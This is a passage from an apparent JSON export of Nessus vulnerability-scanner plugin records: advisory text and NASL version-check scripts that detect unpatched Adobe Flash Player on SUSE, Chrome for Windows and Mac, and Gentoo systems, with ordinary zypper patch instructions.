value:\"https://www.suse.com/security/cve/CVE-2015-3119/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2015-3120/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2015-3121/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2015-3122/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2015-3123/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2015-3124/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2015-3125/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2015-3126/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2015-3127/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2015-3128/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2015-3129/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2015-3130/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2015-3131/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2015-3132/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2015-3133/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2015-3134/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2015-3135/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2015-3136/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2015-3137/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2015-4428/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2015-4429/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2015-4430/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2015-4431/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2015-4432/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2015-4433/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2015-5116/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2015-5117/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2015-5118/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2015-5119/\");\n # https://www.suse.com/support/update/announcement/2015/suse-su-20151214-1.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?2d10fb44\");\n script_set_attribute(attribute:\"solution\", value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Desktop 11-SP4 :\n\nzypper in -t patch sledsp4-flash-player-20150708-1=1\n\nSUSE Linux Enterprise Desktop 11-SP3 :\n\nzypper in -t patch sledsp3-flash-player-20150708-1=1\n\nTo bring your system up-to-date, use 'zypper patch'.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player ByteArray Use After Free');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/07/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/07/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/07/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:flash-player\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:flash-player-gnome\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:flash-player-kde4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLED11)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLED11\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\nif (cpu >!< \"i386|i486|i586|i686|x86_64\") audit(AUDIT_ARCH_NOT, \"i386 / i486 / i586 / i686 / x86_64\", cpu);\n\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLED11\" && (! preg(pattern:\"^(3|4)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLED11 SP3/4\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLED11\", sp:\"4\", cpu:\"x86_64\", reference:\"flash-player-11.2.202.481-0.5.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"4\", cpu:\"x86_64\", reference:\"flash-player-gnome-11.2.202.481-0.5.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"4\", cpu:\"x86_64\", reference:\"flash-player-kde4-11.2.202.481-0.5.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"4\", cpu:\"i586\", reference:\"flash-player-11.2.202.481-0.5.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"4\", cpu:\"i586\", reference:\"flash-player-gnome-11.2.202.481-0.5.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"4\", cpu:\"i586\", reference:\"flash-player-kde4-11.2.202.481-0.5.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"3\", cpu:\"x86_64\", reference:\"flash-player-11.2.202.481-0.5.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"3\", cpu:\"x86_64\", reference:\"flash-player-gnome-11.2.202.481-0.5.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"3\", cpu:\"x86_64\", reference:\"flash-player-kde4-11.2.202.481-0.5.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"3\", cpu:\"i586\", reference:\"flash-player-11.2.202.481-0.5.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"3\", cpu:\"i586\", reference:\"flash-player-gnome-11.2.202.481-0.5.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"3\", cpu:\"i586\", reference:\"flash-player-kde4-11.2.202.481-0.5.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"flash-player\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-12T16:01:27", "description": "The version of Google Chrome installed on the remote Windows host is prior to 43.0.2357.132. It is, therefore, affected by multiple vulnerabilities in the bundled version of Adobe Flash :\n\n - An information disclosure vulnerability exists that allows an attacker to guess the address for the Flash heap. (CVE-2015-3097)\n\n - Multiple heap-based buffer overflow vulnerabilities exist that allow arbitrary code execution.\n (CVE-2015-3135, CVE-2015-4432, CVE-2015-5118)\n\n - Multiple memory corruption vulnerabilities exist that allow arbitrary code execution. (CVE-2015-3117, CVE-2015-3123, CVE-2015-3130, CVE-2015-3133, CVE-2015-3134, CVE-2015-4431)\n\n - Multiple NULL pointer dereference flaws exist.\n (CVE-2015-3126, CVE-2015-4429)\n\n - A security bypass vulnerability exists that results in an information disclosure. (CVE-2015-3114)\n\n - Multiple type confusion vulnerabilities exist that allow arbitrary code execution. (CVE-2015-3119, CVE-2015-3120, CVE-2015-3121, CVE-2015-3122, CVE-2015-4433)\n\n - Multiple use-after-free errors exist that allow arbitrary code execution. (CVE-2015-3118, CVE-2015-3124, CVE-2015-5117, CVE-2015-3127, CVE-2015-3128, CVE-2015-3129, CVE-2015-3131, CVE-2015-3132, CVE-2015-3136, CVE-2015-3137, CVE-2015-4428, CVE-2015-4430, CVE-2015-5119)\n\n - Multiple same-origin policy bypass vulnerabilities exist that allow information disclosure. (CVE-2014-0578, CVE-2015-3115, CVE-2015-3116, CVE-2015-3125, CVE-2015-5116)\n\n - A memory corruption issue exists due to improper validation of user-supplied input. An attacker can exploit this to execute arbitrary code. (CVE-2015-5124)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"score": null, "vector": null}, "published": "2015-07-10T00:00:00", "type": "nessus", "title": "Google Chrome < 43.0.2357.132 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0578", "CVE-2015-3097", "CVE-2015-3114", "CVE-2015-3115", "CVE-2015-3116", "CVE-2015-3117", "CVE-2015-3118", "CVE-2015-3119", "CVE-2015-3120", "CVE-2015-3121", "CVE-2015-3122", "CVE-2015-3123", "CVE-2015-3124", "CVE-2015-3125", "CVE-2015-3126", "CVE-2015-3127", "CVE-2015-3128", "CVE-2015-3129", "CVE-2015-3130", "CVE-2015-3131", "CVE-2015-3132", "CVE-2015-3133", "CVE-2015-3134", "CVE-2015-3135", "CVE-2015-3136", "CVE-2015-3137", "CVE-2015-4428", "CVE-2015-4429", "CVE-2015-4430", "CVE-2015-4431", "CVE-2015-4432", "CVE-2015-4433", "CVE-2015-5116", "CVE-2015-5117", "CVE-2015-5118", "CVE-2015-5119", "CVE-2015-5124"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:google:chrome"], "id": "GOOGLE_CHROME_43_0_2357_132.NASL", "href": "https://www.tenable.com/plugins/nessus/84667", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(84667);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\n \"CVE-2014-0578\",\n \"CVE-2015-3097\",\n \"CVE-2015-3114\",\n \"CVE-2015-3115\",\n \"CVE-2015-3116\",\n \"CVE-2015-3117\",\n \"CVE-2015-3118\",\n \"CVE-2015-3119\",\n \"CVE-2015-3120\",\n \"CVE-2015-3121\",\n \"CVE-2015-3122\",\n \"CVE-2015-3123\",\n \"CVE-2015-3124\",\n \"CVE-2015-3125\",\n \"CVE-2015-3126\",\n \"CVE-2015-3127\",\n \"CVE-2015-3128\",\n \"CVE-2015-3129\",\n \"CVE-2015-3130\",\n \"CVE-2015-3131\",\n \"CVE-2015-3132\",\n \"CVE-2015-3133\",\n \"CVE-2015-3134\",\n \"CVE-2015-3135\",\n \"CVE-2015-3136\",\n \"CVE-2015-3137\",\n \"CVE-2015-4428\",\n \"CVE-2015-4429\",\n \"CVE-2015-4430\",\n \"CVE-2015-4431\",\n \"CVE-2015-4432\",\n \"CVE-2015-4433\",\n \"CVE-2015-5116\",\n \"CVE-2015-5117\",\n \"CVE-2015-5118\",\n \"CVE-2015-5119\",\n \"CVE-2015-5124\"\n );\n script_bugtraq_id(\n 75090,\n 75568,\n 75590,\n 75591,\n 75592,\n 75593,\n 75594,\n 75595,\n 75596\n );\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/03/24\");\n\n script_name(english:\"Google Chrome < 43.0.2357.132 Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host contains a web browser that is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Google Chrome installed on the remote Windows host is\nprior to 43.0.2357.132. It is, therefore, affected by multiple\nvulnerabilities in the bundled version of Adobe Flash :\n\n - An information disclosure vulnerability exists that\n allows an attacker to guess the address for the Flash\n heap. (CVE-2015-3097)\n\n - Multiple heap-based buffer overflow vulnerabilities\n exist that allow arbitrary code execution.\n (CVE-2015-3135, CVE-2015-4432, CVE-2015-5118)\n\n - Multiple memory corruption vulnerabilities exist that\n allow arbitrary code execution. (CVE-2015-3117,\n CVE-2015-3123, CVE-2015-3130, CVE-2015-3133,\n CVE-2015-3134, CVE-2015-4431)\n\n - Multiple NULL pointer dereference flaws exist.\n (CVE-2015-3126, CVE-2015-4429)\n\n - A security bypass vulnerability exists that results in\n an information disclosure. (CVE-2015-3114)\n\n - Multiple type confusion vulnerabilities exist that allow\n arbitrary code execution. (CVE-2015-3119, CVE-2015-3120,\n CVE-2015-3121, CVE-2015-3122, CVE-2015-4433)\n\n - Multiple use-after-free errors exist that allow\n arbitrary code execution. (CVE-2015-3118, CVE-2015-3124,\n CVE-2015-5117, CVE-2015-3127, CVE-2015-3128,\n CVE-2015-3129, CVE-2015-3131, CVE-2015-3132,\n CVE-2015-3136, CVE-2015-3137, CVE-2015-4428,\n CVE-2015-4430, CVE-2015-5119)\n\n - Multiple same-origin policy bypass vulnerabilities exist\n that allow information disclosure. (CVE-2014-0578,\n CVE-2015-3115, CVE-2015-3116, CVE-2015-3125,\n CVE-2015-5116)\n\n - A memory corruption issue exists due to improper\n validation of user-supplied input. An attacker can\n exploit this to execute arbitrary code. (CVE-2015-5124)\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n # http://googlechromereleases.blogspot.ca/2015/07/stable-channel-update.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?e87f6dbb\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb15-16.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Google Chrome 43.0.2357.132 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-5124\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player ByteArray Use After Free');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/07/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/07/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/07/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:google:chrome\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"google_chrome_installed.nasl\");\n script_require_keys(\"SMB/Google_Chrome/Installed\");\n\n exit(0);\n}\n\ninclude(\"google_chrome_version.inc\");\n\nget_kb_item_or_exit(\"SMB/Google_Chrome/Installed\");\ninstalls = get_kb_list(\"SMB/Google_Chrome/*\");\n\ngoogle_chrome_check_version(installs:installs, fix:'43.0.2357.132', severity:SECURITY_HOLE);\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-05T17:19:28", "description": "The version of Google Chrome installed on the remote Mac OS X host is prior to 43.0.2357.132. It is, therefore, affected by multiple vulnerabilities in the bundled version of Adobe Flash :\n\n - An information disclosure vulnerability exists that allows an attacker to guess the address for the Flash heap. (CVE-2015-3097)\n\n - Multiple heap-based buffer overflow vulnerabilities exist that allow arbitrary code execution.\n (CVE-2015-3135, CVE-2015-4432, CVE-2015-5118)\n\n - Multiple memory corruption vulnerabilities exist that allow arbitrary code execution. (CVE-2015-3117, CVE-2015-3123, CVE-2015-3130, CVE-2015-3133, CVE-2015-3134, CVE-2015-4431)\n\n - Multiple NULL pointer dereference flaws exist.\n (CVE-2015-3126, CVE-2015-4429)\n\n - A security bypass vulnerability exists that results in an information disclosure. (CVE-2015-3114)\n\n - Multiple type confusion vulnerabilities exist that allow arbitrary code execution. (CVE-2015-3119, CVE-2015-3120, CVE-2015-3121, CVE-2015-3122, CVE-2015-4433)\n\n - Multiple use-after-free errors exist that allow arbitrary code execution. (CVE-2015-3118, CVE-2015-3124, CVE-2015-5117, CVE-2015-3127, CVE-2015-3128, CVE-2015-3129, CVE-2015-3131, CVE-2015-3132, CVE-2015-3136, CVE-2015-3137, CVE-2015-4428, CVE-2015-4430, CVE-2015-5119)\n\n - Multiple same-origin policy bypass vulnerabilities exist that allow information disclosure. (CVE-2014-0578, CVE-2015-3115, CVE-2015-3116, CVE-2015-3125, CVE-2015-5116)\n\n - A memory corruption issue exists due to improper validation of user-supplied input. An attacker can exploit this to execute arbitrary code. (CVE-2015-5124)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"score": null, "vector": null}, "published": "2015-07-10T00:00:00", "type": "nessus", "title": "Google Chrome < 43.0.2357.132 Multiple Vulnerabilities (Mac OS X)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0578", "CVE-2015-3097", "CVE-2015-3114", "CVE-2015-3115", "CVE-2015-3116", "CVE-2015-3117", "CVE-2015-3118", "CVE-2015-3119", "CVE-2015-3120", "CVE-2015-3121", "CVE-2015-3122", "CVE-2015-3123", "CVE-2015-3124", "CVE-2015-3125", "CVE-2015-3126", "CVE-2015-3127", "CVE-2015-3128", "CVE-2015-3129", "CVE-2015-3130", "CVE-2015-3131", "CVE-2015-3132", "CVE-2015-3133", "CVE-2015-3134", "CVE-2015-3135", "CVE-2015-3136", "CVE-2015-3137", "CVE-2015-4428", "CVE-2015-4429", "CVE-2015-4430", "CVE-2015-4431", "CVE-2015-4432", "CVE-2015-4433", "CVE-2015-5116", "CVE-2015-5117", "CVE-2015-5118", "CVE-2015-5119", "CVE-2015-5124"], "modified": "2022-03-08T00:00:00", "cpe": ["cpe:/a:google:chrome"], "id": "MACOSX_GOOGLE_CHROME_43_0_2357_132.NASL", "href": "https://www.tenable.com/plugins/nessus/84668", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(84668);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/03/08\");\n\n script_cve_id(\n \"CVE-2014-0578\",\n \"CVE-2015-3097\",\n \"CVE-2015-3114\",\n \"CVE-2015-3115\",\n \"CVE-2015-3116\",\n \"CVE-2015-3117\",\n \"CVE-2015-3118\",\n \"CVE-2015-3119\",\n \"CVE-2015-3120\",\n \"CVE-2015-3121\",\n \"CVE-2015-3122\",\n \"CVE-2015-3123\",\n \"CVE-2015-3124\",\n \"CVE-2015-3125\",\n \"CVE-2015-3126\",\n \"CVE-2015-3127\",\n \"CVE-2015-3128\",\n \"CVE-2015-3129\",\n \"CVE-2015-3130\",\n \"CVE-2015-3131\",\n \"CVE-2015-3132\",\n \"CVE-2015-3133\",\n \"CVE-2015-3134\",\n \"CVE-2015-3135\",\n \"CVE-2015-3136\",\n \"CVE-2015-3137\",\n \"CVE-2015-4428\",\n \"CVE-2015-4429\",\n \"CVE-2015-4430\",\n \"CVE-2015-4431\",\n \"CVE-2015-4432\",\n \"CVE-2015-4433\",\n \"CVE-2015-5116\",\n \"CVE-2015-5117\",\n \"CVE-2015-5118\",\n \"CVE-2015-5119\",\n \"CVE-2015-5124\"\n );\n script_bugtraq_id(\n 75090,\n 75568,\n 75590,\n 75591,\n 75592,\n 75593,\n 75594,\n 75595,\n 75596\n );\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/03/24\");\n\n script_name(english:\"Google Chrome < 43.0.2357.132 Multiple Vulnerabilities (Mac OS X)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Mac OS X host contains a web browser that is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Google Chrome installed on the remote Mac OS X host is\nprior to 43.0.2357.132. It is, therefore, affected by multiple\nvulnerabilities in the bundled version of Adobe Flash :\n\n - An information disclosure vulnerability exists that\n allows an attacker to guess the address for the Flash\n heap. (CVE-2015-3097)\n\n - Multiple heap-based buffer overflow vulnerabilities\n exist that allow arbitrary code execution.\n (CVE-2015-3135, CVE-2015-4432, CVE-2015-5118)\n\n - Multiple memory corruption vulnerabilities exist that\n allow arbitrary code execution. (CVE-2015-3117,\n CVE-2015-3123, CVE-2015-3130, CVE-2015-3133,\n CVE-2015-3134, CVE-2015-4431)\n\n - Multiple NULL pointer dereference flaws exist.\n (CVE-2015-3126, CVE-2015-4429)\n\n - A security bypass vulnerability exists that results in\n an information disclosure. (CVE-2015-3114)\n\n - Multiple type confusion vulnerabilities exist that allow\n arbitrary code execution. (CVE-2015-3119, CVE-2015-3120,\n CVE-2015-3121, CVE-2015-3122, CVE-2015-4433)\n\n - Multiple use-after-free errors exist that allow\n arbitrary code execution. (CVE-2015-3118, CVE-2015-3124,\n CVE-2015-5117, CVE-2015-3127, CVE-2015-3128,\n CVE-2015-3129, CVE-2015-3131, CVE-2015-3132,\n CVE-2015-3136, CVE-2015-3137, CVE-2015-4428,\n CVE-2015-4430, CVE-2015-5119)\n\n - Multiple same-origin policy bypass vulnerabilities exist\n that allow information disclosure. (CVE-2014-0578,\n CVE-2015-3115, CVE-2015-3116, CVE-2015-3125,\n CVE-2015-5116)\n\n - A memory corruption issue exists due to improper\n validation of user-supplied input. An attacker can\n exploit this to execute arbitrary code. (CVE-2015-5124)\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n # http://googlechromereleases.blogspot.ca/2015/07/stable-channel-update.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?e87f6dbb\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb15-16.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Google Chrome 43.0.2357.132 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-5124\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player ByteArray Use After Free');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/07/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/07/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/07/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:google:chrome\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"macosx_google_chrome_installed.nbin\");\n script_require_keys(\"MacOSX/Google Chrome/Installed\");\n\n exit(0);\n}\n\ninclude(\"google_chrome_version.inc\");\n\nget_kb_item_or_exit(\"MacOSX/Google Chrome/Installed\");\n\ngoogle_chrome_check_version(fix:'43.0.2357.132', severity:SECURITY_HOLE);\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-23T15:04:56", "description": "The remote host is affected by the vulnerability described in GLSA-201507-13 (Adobe Flash Player: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in Adobe Flash Player.\n Please review the CVE identifiers referenced below for details.\n Impact :\n\n A remote attacker could possibly execute arbitrary code with the privileges of the process, cause a Denial of Service condition, obtain sensitive information, or bypass security restrictions.\n Workaround :\n\n There is no known workaround at this time.", "cvss3": {"score": null, "vector": null}, "published": "2015-09-23T00:00:00", "type": "nessus", "title": "GLSA-201507-13 : Adobe Flash Player: Multiple vulnerabilities (Underminer)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0578", "CVE-2015-3113", "CVE-2015-3114", "CVE-2015-3115", "CVE-2015-3116", "CVE-2015-3117", "CVE-2015-3118", "CVE-2015-3119", "CVE-2015-3120", "CVE-2015-3121", "CVE-2015-3122", "CVE-2015-3123", "CVE-2015-3124", "CVE-2015-3125", "CVE-2015-3126", "CVE-2015-3127", "CVE-2015-3128", "CVE-2015-3129", "CVE-2015-3130", "CVE-2015-3131", "CVE-2015-3132", "CVE-2015-3133", "CVE-2015-3134", "CVE-2015-3135", "CVE-2015-3136", "CVE-2015-3137", "CVE-2015-4428", "CVE-2015-4429", "CVE-2015-4430", "CVE-2015-4431", "CVE-2015-4432", "CVE-2015-4433", "CVE-2015-5116", "CVE-2015-5117", "CVE-2015-5118", "CVE-2015-5119"], "modified": "2022-04-22T00:00:00", "cpe": ["p-cpe:/a:gentoo:linux:adobe-flash", "cpe:/o:gentoo:linux"], "id": "GENTOO_GLSA-201507-13.NASL", "href": "https://www.tenable.com/plugins/nessus/86083", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 201507-13.\n#\n# The advisory text is Copyright (C) 2001-2018 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(86083);\n script_version(\"2.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/22\");\n\n script_cve_id(\n \"CVE-2014-0578\",\n \"CVE-2015-3113\",\n \"CVE-2015-3114\",\n \"CVE-2015-3115\",\n \"CVE-2015-3116\",\n \"CVE-2015-3117\",\n \"CVE-2015-3118\",\n \"CVE-2015-3119\",\n \"CVE-2015-3120\",\n \"CVE-2015-3121\",\n \"CVE-2015-3122\",\n \"CVE-2015-3123\",\n \"CVE-2015-3124\",\n \"CVE-2015-3125\",\n \"CVE-2015-3126\",\n \"CVE-2015-3127\",\n \"CVE-2015-3128\",\n \"CVE-2015-3129\",\n \"CVE-2015-3130\",\n \"CVE-2015-3131\",\n \"CVE-2015-3132\",\n \"CVE-2015-3133\",\n \"CVE-2015-3134\",\n 